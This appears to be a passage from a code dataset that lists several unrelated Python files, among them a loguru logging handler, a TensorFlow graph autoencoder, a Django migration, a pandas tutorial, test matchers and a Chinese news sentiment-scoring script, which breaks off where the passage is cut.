text stringlengths 38 1.54M |
|---|
import logging
from loguru import logger
class InterceptHandler(logging.Handler):
    """Stdlib logging handler that forwards every record to loguru."""

    # stdlib numeric level -> loguru level name
    LEVELS_MAP = {
        logging.CRITICAL: "CRITICAL",
        logging.ERROR: "ERROR",
        logging.WARNING: "WARNING",
        logging.INFO: "INFO",
        logging.DEBUG: "DEBUG",
    }

    def _get_level(self, record):
        # Unknown/custom levels fall back to their numeric value,
        # which loguru also accepts.
        return self.LEVELS_MAP.get(record.levelno, record.levelno)

    def emit(self, record):
        # depth=6 walks loguru's frame inspection back to the original
        # logging call site; exc_info preserves any attached traceback.
        logger.opt(depth=6, exception=record.exc_info).log(
            self._get_level(record), record.getMessage()
        )
def setup(level: str = "INFO"):
    """Route stdlib logging through loguru at *level* and mute noisy loggers."""
    root_level = logging.getLevelName(level)
    logging.basicConfig(level=root_level, handlers=[InterceptHandler()])  # noqa
    for noisy in ("sqlalchemy.engine.base", "pyrogram"):
        logger.disable(noisy)
|
import tensorflow as tf
if tf.__version__.split(".")[0] == "2":
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import tensorflow.keras as K
else:
import tensorflow.contrib.keras as K
import numpy as np
import joblib
import layers
from tensorflow.python.keras.layers import Dense
def build_placeholders(info, config, batch_size=4, **kwargs):
    """Build the TF v1 placeholder set consumed by build_model().

    :param info: dataset descriptor; adj_channel_num, graph_node_num and
        feature_dim are read here
    :param config: unused here; kept for interface compatibility
    :param batch_size: graphs per mini-batch
    :return: dict keyed by "adjs", "epsilon", "mask", "dropout_rate",
        "enabled_node_nums", "is_train" and "features"
    """
    adj_channel_num = info.adj_channel_num
    encoder_output_dim = 64  # latent size; must match encode()'s output dim
    preference_list_length = 2  # pair of graphs: [input, paired target]
    # adjs[p][b][a]: sparse adjacency for preference p, batch item b, channel a
    adjs = [
        [
            [
                tf.sparse_placeholder(
                    tf.float32, name="adj_" + str(a) + "_" + str(b) + "_" + str(p)
                )
                for a in range(adj_channel_num)
            ]
            for b in range(batch_size)
        ]
        for p in range(preference_list_length)
    ]
    return {
        "adjs": adjs,
        # noise input for the reparameterization trick in build_model()
        "epsilon": tf.placeholder(
            tf.float32,
            shape=(batch_size, info.graph_node_num, encoder_output_dim),
            name="epsilon",
        ),
        # per-preference sample mask over the batch
        "mask": [
            tf.placeholder(tf.float32, shape=(batch_size,), name="mask" + "_" + str(p))
            for p in range(preference_list_length)
        ],
        "dropout_rate": tf.placeholder(tf.float32, name="dropout_rate"),
        "enabled_node_nums": tf.placeholder(
            tf.int32, shape=(batch_size,), name="enabled_node_nums"
        ),
        "is_train": tf.placeholder(tf.bool, name="is_train"),
        # per-preference node feature tensors
        "features": [
            tf.placeholder(
                tf.float32,
                shape=(batch_size, info.graph_node_num, info.feature_dim),
                name="feature" + "_" + str(p),
            )
            for p in range(preference_list_length)
        ],
    }
def encode(name, inputs, info, batch_size):
    """Graph VAE encoder: produce per-graph (mean, std) of the latent code.

    Two GraphConv + BatchNorm + tanh blocks, a GraphDense + sigmoid, then
    GraphGather pools nodes into one vector per graph; two Dense heads
    emit the Gaussian parameters.

    :param name: variable scope name
    :param inputs: placeholder dict assembled in build_model()
    :param info: dataset descriptor
    :param batch_size: unused here
    :return: (mean_layer, std_layer)
    """
    internal_dim = 64
    encoder_output_dim = inputs["encoder_output_dim"]
    in_adjs = inputs["adjs"]
    features = inputs["features"]
    dropout_rate = inputs["dropout_rate"]  # read but unused
    is_train = inputs["is_train"]  # read but unused
    enabled_node_nums = inputs["enabled_node_nums"]
    adj_channel_num = info.adj_channel_num
    with tf.variable_scope(name):
        layer = features
        layer = layers.GraphConv(internal_dim, adj_channel_num)(layer, adj=in_adjs)
        layer = layers.GraphBatchNormalization()(
            layer, max_node_num=info.graph_node_num, enabled_node_nums=enabled_node_nums
        )
        layer = tf.tanh(layer)
        layer = layers.GraphConv(internal_dim, adj_channel_num)(layer, adj=in_adjs)
        layer = layers.GraphBatchNormalization()(
            layer, max_node_num=info.graph_node_num, enabled_node_nums=enabled_node_nums
        )
        layer = tf.tanh(layer)
        layer = layers.GraphDense(internal_dim)(layer)
        layer = tf.sigmoid(layer)
        layer = layers.GraphGather()(layer)
        mean_layer = Dense(encoder_output_dim, kernel_initializer="random_uniform")(
            layer
        )
        std_layer = Dense(encoder_output_dim)(layer)
        # softplus then sqrt keeps the standard deviation non-negative
        std_layer = tf.nn.softplus(std_layer)
        std_layer = tf.sqrt(std_layer)
        # clip for numerical stability; std is already >= 0, so the
        # [-5, 5] clip effectively caps it at 5
        mean_layer = tf.clip_by_value(mean_layer, -100, 100)
        std_layer = tf.clip_by_value(std_layer, -5, 5)
    return mean_layer, std_layer
def decode_nodes(name, inputs, info):
    """Decode node features from the latent layer with one graph dense layer.

    Only "input_layer" and "output_layer_dim" are consumed; the other keys
    of *inputs* ("dropout_rate", "input_layer_dim", "decoded_node_num",
    "is_train", "enabled_node_nums") were previously read into unused
    locals and are no longer touched.

    :param name: variable scope name
    :param inputs: decoder input dict (see build_model)
    :param info: dataset descriptor (unused)
    :return: decoded node-feature tensor
    """
    layer = inputs["input_layer"]
    decoded_output_dim = inputs["output_layer_dim"]
    with tf.variable_scope(name):
        layer = layers.GraphDense(
            decoded_output_dim, kernel_initializer="random_uniform", name="dense_1"
        )(layer)
    return layer
def decode_links(name, inputs, info):
    """Decode per-channel link scores (logits) from latent node vectors.

    Pipeline: GraphDense -> GraphBatchNormalization -> sigmoid ->
    GraphDense -> sigmoid -> DistMult decoder.

    :param name: variable scope name
    :param inputs: decoder input dict (see build_model)
    :param info: dataset descriptor (graph_node_num used for batch norm)
    :return: decoded adjacency logits for one channel
    """
    dropout_rate = inputs["dropout_rate"]  # read but unused
    internal_dim = 64
    layer = inputs["input_layer"]
    input_dim = inputs["input_layer_dim"]  # read but unused
    is_train = inputs["is_train"]  # read but unused
    node_num = inputs["decoded_node_num"]  # read but unused
    enabled_node_nums = inputs["enabled_node_nums"]
    with tf.variable_scope(name):
        layer = layers.GraphDense(internal_dim, name="dense_1")(layer)
        layer = layers.GraphBatchNormalization(name="bn_1")(
            layer, max_node_num=info.graph_node_num, enabled_node_nums=enabled_node_nums
        )
        layer = tf.sigmoid(layer)
        layer = layers.GraphDense(internal_dim, name="dense_2")(layer)
        layer = tf.sigmoid(layer)
        # alternative decoder kept for reference:
        # layer=layers.GraphDecoderInnerProd()(layer)
        layer = layers.GraphDecoderDistMult()(layer)
    return layer
def build_model(placeholders, info, config, batch_size=4, **kwargs):
    """Assemble the graph VAE: encoder, reparameterization, link decoder, losses.

    :param placeholders: dict built by build_placeholders()
    :param info: dataset descriptor (adj_channel_num, graph_node_num,
        feature_enabled, pos_weight, norm)
    :param config: unused here
    :param batch_size: graphs per mini-batch
    :return: (decoded_adjs, prediction, cost_opt, cost_sum, metrics)
    """
    adj_channel_num = info.adj_channel_num
    embedding_dim = 64  # unused
    ## compute output 0
    if not info.feature_enabled:
        print("[ERROR] not supported yet")
        quit()
    # encoder: consumes the first element of each preference pair
    features = placeholders["features"][0]
    mask = placeholders["mask"][0]
    encoder_output_dim = 64  # must match the epsilon placeholder's last dim
    input_encoder = {
        "adjs": placeholders["adjs"][0],
        "features": features,
        "encoder_output_dim": encoder_output_dim,
        "dropout_rate": placeholders["dropout_rate"],
        "is_train": placeholders["is_train"],
        "enabled_node_nums": placeholders["enabled_node_nums"],
    }
    layer_mean, layer_std = encode(
        "encode_nn", input_encoder, info, batch_size=batch_size
    )
    # layer_mean: batch_size x dim
    # generating node_num vectors
    z = layer_mean + layer_std * placeholders["epsilon"]  # reparameterization trick
    # TODO: use stable cost function
    # e=1.0e-10
    # klqp_loss_el=1+2*tf.log(layer_std+e)-layer_mean**2-layer_std
    # klqp_loss_el=tf.reduce_sum(klqp_loss_el,axis=2)
    # klqp_loss_el=tf.reduce_sum(klqp_loss_el,axis=1)
    # klqp_loss=-1/2.0*tf.reduce_mean(klqp_loss_el,axis=0)
    # layer: batch_size x node_num x dim
    ## decoder
    decoded_node_num = info.graph_node_num
    input_decoder = {
        "input_layer": z,
        "input_layer_dim": 64,
        "output_layer_dim": 75,
        "decoded_node_num": decoded_node_num,
        "dropout_rate": placeholders["dropout_rate"],
        "is_train": placeholders["is_train"],
        "enabled_node_nums": placeholders["enabled_node_nums"],
    }
    ### decoder for links: one DistMult decoder per adjacency channel
    decoded_adjs_list = []
    for c in range(adj_channel_num):
        decoded_adj = decode_links("decode_links_" + str(c), input_decoder, info)
        decoded_adjs_list.append(decoded_adj)
    decoded_adjs = tf.stack(decoded_adjs_list)
    # channel-major -> batch-major: batch x channel x N x N
    decoded_adjs = tf.transpose(decoded_adjs, [1, 0, 2, 3])
    ## computing cost against the second element of each preference pair
    pair_adjs_sp = placeholders["adjs"][1]
    pair_features = placeholders["features"][1]
    ### array of sparse matrices to dense
    pair_adjs_list = []
    for b in range(batch_size):
        adj_y = [
            tf.sparse_tensor_to_dense(pair_adjs_sp[b][c], validate_indices=False)
            for c in range(adj_channel_num)
        ]
        pair_adjs_list.append(tf.stack(adj_y))
    pair_adjs = tf.stack(pair_adjs_list)
    # KL-style regularizer.
    # NOTE(review): a standard Gaussian VAE KL uses the mean and the
    # variance (1 + log(sigma^2) - mu^2 - sigma^2); this uses tf.square(z)
    # and layer_std instead, and a hard-coded 1/70 scale - looks suspicious,
    # confirm against training behavior before changing (see the commented
    # klqp_loss above for the intended form).
    kl = (0.5 / 70) * tf.reduce_mean(
        tf.reduce_sum(1 + 2 * tf.log(layer_std) - tf.square(z) - layer_std, 1), 1
    )
    #
    # adjs: batch_size x channel x N x N
    cross_entropy = tf.nn.weighted_cross_entropy_with_logits(
        targets=pair_adjs, logits=decoded_adjs, pos_weight=info.pos_weight
    )
    ae_cost = info.norm * tf.reduce_mean(cross_entropy, axis=[1, 2, 3])
    # sum all costs; mask zeroes out disabled batch entries
    cost = mask * ae_cost
    cost_opt = tf.abs(tf.reduce_mean(cost) - tf.reduce_mean(kl))
    cost_sum = tf.reduce_mean(cost)
    ## TODO: computing metrics
    print(decoded_adjs.shape)
    print(pair_adjs.shape)
    # Edge-existence agreement, max-pooled over channels. A 0.0 logit
    # threshold corresponds to 0.5 probability after sigmoid, matching the
    # 0.5 threshold applied to the dense targets.
    correct_exist = tf.cast(
        tf.equal(
            tf.reduce_max(decoded_adjs, 1) > 0.0, tf.reduce_max(pair_adjs, 1) > 0.5
        ),
        tf.float32,
    )
    # correct_count=mask*tf.reduce_sum(tf.reduce_sum(correct_exist,2),1)
    correct_count = mask * tf.reduce_mean(correct_exist, axis=[1, 2])
    metrics = {}
    metrics["correct_count"] = tf.reduce_sum(correct_count)
    ## TODO: prediction (final result)
    prediction = {"feature": features, "dense_adj": tf.sigmoid(decoded_adjs)}
    return decoded_adjs, prediction, cost_opt, cost_sum, metrics
|
import sys
import pdb
#pdb.set_trace()
# Rewrite each whitespace-separated input record as a tab-separated
# "chr<col1> <col3> <col3> <col9>" line on stdout (column 3 is emitted
# twice: single-base start/end positions).
with open(sys.argv[1]) as handle:
    for record in handle:
        fields = record.split()
        sys.stdout.write('chr%s\t%s\t%s\t%s\n' % (fields[1], fields[3], fields[3], fields[9]))
# Generated by Django 3.0.3 on 2020-03-10 17:35
from django.db import migrations, models
class Migration(migrations.Migration):
    # Applies on top of the previous auto-generated webapp migration.
    dependencies = [
        ('webapp', '0003_auto_20200310_1657'),
    ]
    # Redeclares Comment.active as a BooleanField defaulting to True
    # (presumably a moderation/visibility flag - confirm in webapp.models).
    operations = [
        migrations.AlterField(
            model_name='comment',
            name='active',
            field=models.BooleanField(default=True),
        ),
    ]
|
import pandas as pd
# Mixed-type list: Python lists can hold heterogeneous values.
listaVariada = ['a', 1, 2, 4.6]
print(listaVariada)

# Series from integer and float lists (default RangeIndex).
seriesPandas = pd.Series([1, 2, 5])
print(seriesPandas)
seriesPandas = pd.Series([4.6, 5.7, 0.1])
print(seriesPandas)

# Monthly earnings keyed by month name.
dicGanancia = {'Enero': 4300, 'Febrero': 4545, 'Marzo': 2324, 'Abril': 1244}

seriesGananciaPorMes = pd.Series([4300, 4545, 2324, 1244])
print(seriesGananciaPorMes)

# A dict-backed Series supports label slicing (end label inclusive).
seriesGananciaPorMesDic = pd.Series(dicGanancia)
print(seriesGananciaPorMesDic['Enero':'Marzo'])
print(seriesGananciaPorMesDic['Febrero':'Marzo'])

# DataFrame built from equal-length columns.
matrizEstudiantes = {
    'Grupo1': ['Karla', 'Mario', 'Laura'],
    'Grupo2': ['Santi', 'Arturo', 'Vale'],
    'Grupo3': ['Juan', 'Melany', 'Laura'],
    'Grupo4': ['Mafer', 'Esteban', 'Daniel'],
}
dataFrameNombres = pd.DataFrame(matrizEstudiantes)
print(dataFrameNombres)
print(dataFrameNombres['Grupo2'])
print(dataFrameNombres.iloc[1:2])

# DataFrame with an explicit row index.
dicVentasPorMes = {
    'Marzo(millones de pesos)': [1234, 4235, 3356],
    'Abril(millones de pesos)': [1234, 42355, 7356],
    'Mayo(millones de pesos)': [4234, 4635, 1356],
}
dataFrameVentas = pd.DataFrame(dicVentasPorMes, index=['Tomates', 'Papas', 'Yuca'])
print(dataFrameVentas)
print(dataFrameVentas.iloc[:2])
|
"""Matchers for testing collections have specific items."""
from h_matchers.matcher.core import Matcher
class AnyIterableWithItemsInOrder(Matcher):
    """Matches any item which contains certain elements in order."""

    def __init__(self, items_to_match):
        super().__init__(
            f"* contains {items_to_match} in any order *",
            lambda other: self._contains_in_order(other, items_to_match),
        )

    @classmethod
    def _contains_in_order(cls, container, items_to_match):
        """Check if each item can be found in order in the container.

        :param container: An iterable of items to check over
        :param items_to_match: An iterable of items to try and match
        :return: A boolean indicating whether each item can be matched
        """
        # Materialise first so generators can be searched repeatedly
        try:
            haystack = list(container)
        except TypeError:
            # It's not even iterable
            return False

        search_from = 0
        for needle in items_to_match:
            try:
                # Each item must appear at or after the previous match
                search_from = haystack.index(needle, search_from) + 1
            except ValueError:
                return False
        return True
class AnyIterableWithItems(Matcher):
    """Matches any item which contains certain elements."""

    def __init__(self, items_to_match):
        super().__init__(
            f"* contains {items_to_match} in any order *",
            lambda other: self._contains_in_any_order(other, items_to_match),
        )

    @classmethod
    def _contains_in_any_order(cls, container, items_to_match):
        """Check each item can be matched to a distinct container element.

        :param container: An iterable of items to check over
        :param items_to_match: An iterable of items (or matchers) to match
        :return: A boolean indicating whether a one-to-one assignment exists
        """
        # See `containment.md` for a description of this algorithm
        try:
            container = list(container)
        except TypeError:
            # Not even an iterable
            return False
        # Create a tuple of tuples containing the matcher index, and the set of all
        # possible indices of items from the container which could be a match. From
        # here on in, we deal entirely with indices, no matcher matching will happen
        # again.
        unsolved = tuple(
            (
                match_index,
                {
                    item_index
                    for item_index, item in enumerate(container)
                    if item == matcher
                },
            )
            for match_index, matcher in enumerate(items_to_match)
        )
        if matched_item_indices := cls._solve(unsolved=unsolved, solved=[]):
            # Update any matchers to have the correct last history entry.
            # For each item in items_to_match which is a matcher, set its
            # history as if it had just matched against the corresponding
            # item in container. This fixes the history we messed up with
            # the matching operations creating `unsolved` above.
            for item_to_match, matched_item_index in zip(
                items_to_match, matched_item_indices
            ):
                if isinstance(item_to_match, Matcher):
                    item_to_match.matched_to = [container[matched_item_index]]
            return True
        return False

    @classmethod
    def _solve(cls, unsolved: tuple, solved: list):
        """Get the first solution as a mapping from match to item index.

        :param unsolved: Tuple of (match index, set of candidate item indices)
        :param solved: List of (match index, chosen item index) pairs
        :return: Tuple of matching target indices, or None if unsolvable
        """
        # If there are no more unsolved parts, we are done! This is the
        # recursion base case.
        if not unsolved:
            return tuple(item_index for _match_index, item_index in sorted(solved))
        # Sort our unsolved parts by the number of possibilities they have.
        # Solve those with fewer possibilities first as they are less free.
        # Separate out the head as the most constrained.
        head, *tail = sorted(unsolved, key=lambda item: len(item[1]))
        head_pos, head_possibilities = head
        for chosen_match in head_possibilities:
            # For every possible match from the head we recurse in...
            if result := cls._solve(
                # Create a new unsolved tuple by removing the match from all the
                # other unsolved parts. It's no longer a possibility for them:
                # another part has matched it against the head.
                unsolved=tuple(
                    (pos, possibility - {chosen_match}) for pos, possibility in tail
                ),
                # Extend the solved parts with the new solution
                solved=solved + [(head_pos, chosen_match)],
            ):
                return result
        return None
class AnyMappingWithItems(Matcher):
    """Matches any mapping containing the specified key/value pairs."""

    def __init__(self, key_values):
        super().__init__(
            f"* contains {key_values} *",
            lambda other: self._contains_values(other, key_values),
        )

    @classmethod
    def _contains_values(cls, container, key_values):
        """Dispatch to the fastest comparison available for *container*."""
        # Plain dicts get a direct key/value walk - 200-300x faster than
        # the generic search-based fallback.
        if isinstance(container, dict):
            return cls._dict_comparison(container, key_values)
        # Anything else mapping-like falls back to unordered item matching
        if hasattr(container, "items"):
            return cls._mapping_comparison(container, key_values)
        return False

    @classmethod
    def _dict_comparison(cls, container, key_values):
        """Compare directly against a plain dict."""
        for key, expected in key_values.items():
            # Keep the expected value on the left of the comparison so
            # matcher objects get a chance to kick in
            if key not in container or expected != container[key]:
                return False
        return True

    @classmethod
    def _mapping_comparison(cls, container, key_values):
        """Generic mapping comparison via unordered item matching."""
        wanted = cls._normalise_items(key_values)
        found = cls._normalise_items(container)
        return found == AnyIterableWithItems(wanted)

    @classmethod
    def _normalise_items(cls, mapping):
        """Handle badly behaved items() implementations returning lists."""
        return tuple((key, value) for key, value in mapping.items())
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Created on 2018-06-04 11:34:28
# Project: mafengwo
# Print the scheme+host prefix of the URL, including the trailing slash.
a="http://222.asdsad.com/asda/asdasd"
# Remove "://" so the first "/" found below is the start of the path
b=a.replace("://","")
inx=b.find("/")
# +4 = the 3 characters of the removed "://" plus 1 to include the slash
print(a[:inx+4])
#-*- coding:utf-8 -*-
__author__ = 'chengmin'
try:
import psyco
psyco.full()
except ImportError:
pass # psyco not installed so continue as usual
import os
import chardet
import time
from zhtools.langconv import *
import Sentiment
import os
from zhtools.langconv import *
import jieba
#import codecs
#import snownlp
import jieba.posseg as pseg
import time
#t1=time.time()
# Snapshot of the working directory contents (not used by the workers below)
filelist=os.listdir(os.getcwd())
# POS-tag suffixes to filter out of the segmented text (author-defined list
# of part-of-speech tags to discard)
cixing=["/x","/zg","/uj","/ul","/e","/d","/uz","/y"]
#f=codecs.open("Positive", 'r', encoding='utf-8',errors='ignore')
#from multiprocessing import Pool
#from multiprocessing import Process, Queue
def Worker1(eachfolder,sentiment_value,list_name,title_weight,dict_name):
    """Accumulate sentiment per company over every file in *eachfolder*.

    For each non-empty file, ComputeSentiment(file) is credited to every
    company whose stored appearance count (filled in by Worker2) is >= 2.

    NOTE(review): list_temp is built with map(); under Python 3 the second
    max(list_temp) call inside the comprehension would consume an exhausted
    iterator and fail - this code appears to target Python 2 (see the
    unicode() call in ComputeSentiment). title_weight is accepted but unused.
    """
    print("Process ID# %s" % (os.getpid()))
    eachfolder_size=len(os.listdir(os.path.join(os.getcwd(),eachfolder)))
    for eachfile in os.listdir(os.path.join(os.getcwd(),eachfolder)):
        eachfolder_size-=1
        print(str(eachfolder_size)+"left.....................^_^")
        if 1>0:  # placeholder guard left over from debugging
            with open(os.path.join(os.path.join(os.getcwd(),eachfolder),eachfile),"rb")as fin2:#unicode step1: rb
                eachlines=fin2.readlines()
                if len(eachlines)==0:
                    continue
                if 1>0:  # placeholder guard left over from debugging
                    # appearance counts recorded by Worker2, as ints
                    list_temp = map(lambda a:int(a),[v for i,v in dict_name.items()])
                    if max(list_temp)<2:
                        continue
                    else:
                        # indices of companies whose count reached the threshold
                        y_indexes=[i for i,v in enumerate(list_name) if int(dict_name[v])<=max(list_temp) and int(dict_name[v])>=2]
                        for y in y_indexes:
                            sentiment_value[list_name[y]]=sentiment_value[list_name[y]]+float(ComputeSentiment(eachfolder,eachfile))
                else:
                    pass
        else:
            continue
    return sentiment_value
#print "Parent Process ID# %s" % (os.getppid())
#print "%s will sleep for %s seconds" % (name, seconds)
#def offer(queue):
#queue.put("Hello World")
def LoadPositiveDict():
    """Read <cwd>/Positive.txt into {word: 1}, skipping one-char lines."""
    path = os.path.join(os.getcwd(), "Positive.txt")
    positive = {}
    with open(path) as f:
        for line in f:
            word = line.strip()
            # single characters and blank lines are too noisy to keep
            if len(word) > 1:
                positive[word] = 1
    return positive
def LoadNegativeDict():
    """Read <cwd>/Negative.txt into {word: 1}, skipping one-char lines."""
    path = os.path.join(os.getcwd(), "Negative.txt")
    negative = {}
    with open(path) as f:
        for line in f:
            word = line.strip()
            # single characters and blank lines are too noisy to keep
            if len(word) > 1:
                negative[word] = 1
    return negative
def ComputeSentiment(filefolder,filename):
    """Score one file's sentiment from its word content.

    Reads <cwd>/<filefolder>/<filename>, takes the section after "###",
    strips leading/trailing metadata columns, segments it with jieba
    (POS-tagged), drops words whose POS tag appears in the module-level
    `cixing` list, then counts hits against the positive/negative
    dictionaries.

    :return: (Positive - Negative) / matched-word-count, 0 if no word
        matched either dictionary, or the sentinel 9999 when the file has
        no "###" section.

    NOTE(review): the unicode() call below only exists on Python 2 -
    confirm target interpreter before reuse.
    """
    with open(os.path.join(os.path.join(os.getcwd(),filefolder),filename),"r")as fin:  # read the text file
        #valstring=fin.read().decode("utf-8")
        #print(os.path.join(os.getcwd()+'/'+filefolder,filename))
        valstring=fin.read()
    vallist=valstring.split("###")
    #print(vallist)
    if len(vallist) < 2: return 9999  # sentinel: malformed file
    #vallist2=vallist[1].strip().split('\t',2)
    valstring2=vallist[1].strip()
    #print(valstring2)
    valstringlist=valstring2.strip().split('\t')
    #filter(lambda a:len(a)>1,)
    valstringlist1=list(map(lambda a:a.strip(),valstringlist))
    valstringlist2=list(filter(lambda a:len(a)>1,valstringlist1))
    # Strip metadata columns: always drop the first two fields, then drop
    # trailing fields until only the body text remains (count depends on
    # how many columns survived the length filter above).
    if len(valstringlist2) == 7:
        valstringlist2.pop(0)
        valstringlist2.pop(0)
        valstringlist2.pop(len(valstringlist2)-1)
        valstringlist2.pop(len(valstringlist2)-1)
        valstringlist2.pop(len(valstringlist2)-1)
        valstringlist2.pop(len(valstringlist2)-1)
    elif len(valstringlist2) == 6:
        valstringlist2.pop(0)
        valstringlist2.pop(0)
        valstringlist2.pop(len(valstringlist2)-1)
        valstringlist2.pop(len(valstringlist2)-1)
        valstringlist2.pop(len(valstringlist2)-1)
    elif len(valstringlist2) == 5:
        valstringlist2.pop(0)
        valstringlist2.pop(0)
        valstringlist2.pop(len(valstringlist2)-1)
        valstringlist2.pop(len(valstringlist2)-1)
    elif len(valstringlist2) == 4:
        valstringlist2.pop(0)
        valstringlist2.pop(0)
        valstringlist2.pop(len(valstringlist2)-1)
    valstring3=''.join(valstringlist2)
    #jieba.enable_parallel()
    words = pseg.cut(valstring3)  # segment the text with POS tagging
    NumberofWords=0
    result1=""
    for w in words:
        NumberofWords += 1
        try:
            # normalize to Simplified Chinese; best-effort
            w.word = Converter('zh-hans').convert(w.word)
        except:
            pass
        temp = unicode(w.word).encode("utf-8")
        result1 = result1 + '#@' + str(temp)+"/"+str(w.flag)  # append POS tag
    #print(words)
    #print(NumberofWords)
    resultlist1=result1.split('#@')
    resultlist1=list(filter(lambda a:len(a)>1,resultlist1))
    # remove every segment whose POS tag is in the filtered list
    templist=resultlist1[:]
    for segs in templist:
        for K in cixing:
            if K in segs:
                resultlist1.remove(segs)
                break
        else:
            pass
    #print(resultlist1)  # final filtered segments
    #txtlist.extend(line_list)
    #with open("t_with_POS_tag.txt","w") as fout:  # save results elsewhere
    #fout.writelines(resultlist1)
    TotalCount=0
    Positive_Value=0
    Negative_Value=0
    PositiveDict=LoadPositiveDict()
    NegativeDict=LoadNegativeDict()
    for each in resultlist1:
        if 1>0:  # placeholder guard left over from debugging
            val=each.split('/')
            if val[0].strip() in PositiveDict:
                Positive_Value=Positive_Value + abs(PositiveDict[val[0].strip()])
                TotalCount += 1
                #print("Positive_Value is ......................... "+str(Positive_Value)+" -----"+str(val[0]))
            if val[0].strip() in NegativeDict:
                Negative_Value=Negative_Value + abs(NegativeDict[val[0].strip()])
                TotalCount += 1
                #print("Negative_Value is ......................... "+str(Negative_Value)+" -----"+str(val[0]))
        else:
            continue
    if TotalCount>0:
        #SentimentValue=float(Positive_Value-Negative_Value)#M1.P-N
        SentimentValue=float(Positive_Value-Negative_Value)/TotalCount#M2.P-N/count
        #SentimentValue=float(Positive_Value-Negative_Value)/(Positive_Value+Negative_Value)#M3.P-N/count
        #SentimentValue=float(Positive_Value-Negative_Value)/(Positive_Value+Negative_Value)#M4.P-N/count
    else:
        SentimentValue=0
    #print("Sentiment is ------------------"+str(SentimentValue)+ "----------Total Count is "+str(TotalCount))
    return SentimentValue
#t2=time.time()
#print("分词及词性标注完成,耗时:"+str(t2-t1)+"秒。") #反馈结果
def Initlization():
    """Read InPut_List.txt ("name1%name2" per line) and init tracking state.

    :return: (dict_name, sentiment_value, list_name, title_weight) where
        dict_name maps item -> appearance count stored as a str ('0'),
        sentiment_value maps item -> accumulated sentiment (0),
        list_name preserves first-seen order, and title_weight is the
        extra weight applied to matches found in a file's title.

    NOTE(review): the file is opened in binary mode but each line is split
    with the str '%' - that only works where bytes and str coincide
    (Python 2); confirm the target interpreter.
    """
    dict_name={}
    sentiment_value={}
    list_name=[]
    title_weight=float(1.234567891234567)
    with open(os.path.join(os.getcwd(),"InPut_List.txt"),"rb")as fin1:
        for eachline1 in fin1:
            #print(eachline1)
            #mytype = (chardet.detect(eachline1))['encoding']
            val1=eachline1.split('%')
            if len(val1) < 2: continue
            item1=val1[0].strip()
            item2=val1[1].strip()
            item=item1+'%'+item2
            #Change to Simplfied-Chinese
            #item = Converter('zh-hant').convert(item)
            # register each item only once, keeping first-seen order
            flag=item in dict_name.keys()
            if flag==True:
                pass
            elif flag==False:
                dict_name[item]='0'
                sentiment_value[item]=0
                list_name.append(item)
    #list_name=list(set(list_name))
    return dict_name,sentiment_value,list_name,title_weight
#Compute how many appearance times for each company in each folder
def Worker2(eachfolder,dict_name,list_name,title_weight):
    """Count, per company, weighted name mentions in each file of *eachfolder*.

    A file is credited to the company (or companies, on ties) with the
    highest mention score, and only when that score is >= 2. Title matches
    count title_weight times a body match. Counts are stored back into
    dict_name as strings.

    NOTE(review): chardet on a line read in text mode plus the
    decode/encode round-trip indicates Python 2; the bare excepts silently
    swallow any per-file failure.
    """
    eachfolder_size=len(os.listdir(os.path.join(os.getcwd(),eachfolder)))
    for eachfile in os.listdir(os.path.join(os.getcwd(),eachfolder)):
        try:
            eachfolder_size-=1
            print(str(eachfolder_size)+"left...^_^")
            # one mention score per tracked company
            list_temp=[0 for x in range(len(dict_name))]
            with open(os.path.join(os.path.join(os.getcwd(),eachfolder),eachfile),"r")as fin2:#unicode step1: rb
                eachlines=fin2.readlines()
                #eachlines=eachlines.decode("utf-8")
                if len(eachlines)==0:
                    continue
                mytype=chardet.detect(eachlines[0])["encoding"]#unicode step2:detect type using chardet
                try:
                    eachlines=eachlines[0].decode(mytype).encode("utf-8")
                except:
                    pass
                #eachlines=eachlines[0].decode(mytype).encode("utf-8").decode("utf-8")#unicode step3:first decode from mytype to unicode/which is str
                for x in range(len(dict_name)):#find the company name is shown in content and compute the times
                    try:
                        tempitem1,tempitem2=list_name[x].strip().split('%')
                        if tempitem1==tempitem2:
                            #print(chardet.detect(eachlines)["encoding"])
                            list_temp[x]=list_temp[x]+eachlines.count(tempitem1)
                            list_temp[x]=list_temp[x]+eachfile.count(tempitem1)*title_weight#compute the value that company name shown in title
                        else:
                            list_temp[x]=list_temp[x]+eachlines.count(tempitem1)+eachlines.count(tempitem2)
                            list_temp[x]=list_temp[x]+(eachfile.count(tempitem1)+eachfile.count(tempitem2))*title_weight
                    except:
                        continue
                if max(list_temp)<2:
                    continue
                else:
                    # credit every company tied for the maximum score
                    y_indexes=[i for i,v in enumerate(list_temp) if v==max(list_temp)]
                    for y in y_indexes:
                        #if list_name[y]=="萬科":
                        #hh.append(eachfile)
                        dict_name[list_name[y]]=str(int(dict_name[list_name[y]])+1)
                        #sentiment_value[list_name[y]]=sentiment_value[list_name[y]]+ComputeSentiment(eachfolder,eachfile)
                    #temp_i=y_indexes[0]
                    #dict_name[list_name[temp_i]]=str(int(dict_name[list_name[temp_i]])+1)
                    #sentiment_value[list_name[temp_i]]=sentiment_value[list_name[temp_i]]+Sentiment.ComputeSentiment(eachfolder,eachfile)
                    #print(eachfile+"---"+list_name[temp_i]+str(max(list_temp)))
                    #print(y_indexes)
        except:
            continue
    return dict_name
def Worker3(eachfolder):
    """Run the counting pass then the sentiment pass for one folder.

    :param eachfolder: folder name relative to the working directory
    :return: (dict_name, sentiment_value) - appearance counts and
        accumulated sentiment keyed by "name1%name2" item
    """
    # Fresh state for this folder
    dict_name, sentiment_value, list_name, title_weight = Initlization()
    # Pass 1: count weighted name mentions per file
    dict_name = Worker2(eachfolder, dict_name, list_name, title_weight)
    # Pass 2: accumulate sentiment for companies that passed the threshold
    sentiment_value = Worker1(eachfolder, sentiment_value, list_name, title_weight, dict_name)
    return dict_name, sentiment_value
#os.chdir("/home/cityu/wisenewscode")
# NOTE(review): time.clock() was removed in Python 3.8; together with the
# bytes/str mixing above, this driver targets Python 2.
start=time.clock()
# Process only the year-range folders of interest in the working directory
folders=[x for x in os.listdir(os.getcwd()) if os.path.isdir(x)==True and '2014~~2015' in x]
for eachfolder in folders:
    print(eachfolder+" is processing")
    dict_name,sentiment_value=Worker3(eachfolder)
    print("------------------------------------------------------------------>>>")
    # One "<item>\t\t<count>\t\t<sentiment>" line per tracked company
    with open(os.path.join(os.getcwd(),eachfolder+"_M2.txt"),'w')as fout2:
        for (k,v) in dict_name.items():
